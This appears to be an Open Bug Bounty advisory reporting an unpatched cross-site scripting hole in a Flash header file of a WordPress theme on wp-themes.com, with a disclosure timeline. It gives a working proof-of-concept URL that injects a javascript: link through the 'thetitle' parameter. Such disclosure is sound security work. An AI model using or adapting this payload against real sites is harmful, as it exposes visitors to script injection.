wp-themes.com XSS vulnerability

2016-08-10T11:20:00
ID OBB:173010
Type openbugbounty
Reporter RahulKankrale
Modified 2016-11-03T14:15:00

Description

Vulnerable URL:
http://wp-themes.com/wp-content/themes/simplistix/flash/typewrite_header.swf?thetitle=%3Ca%20href=%27javascript:alert(/openbugbounty/)%27%3EClick%20me%3C/a%3E&thestrap;=Previewing%20Another%20WordPress%20Blog
Details:

Description| Value
---|---
Patched:| No
Latest check for patch:| 30.07.2017
Vulnerability type:| XSS
Vulnerability status:| Publicly disclosed
Alexa Rank| 24946
VIP website status:| Yes
Check wp-themes.com SSL connection:| (Grade: A+)

Coordinated Disclosure Timeline:

Description| Value
---|---
Vulnerability submitted via Open Bug Bounty| 10 August, 2016 11:20 GMT
Vulnerability existence verified and confirmed| 11 August, 2016 13:51 GMT
Generic security notifications sent to website owner| 11 August, 2016 13:51 GMT
Notification sent to subscribers (without technical details)| 11 August, 2016 14:17 GMT
Vulnerability details disclosed by researcher| 3 November, 2016 14:15 GMT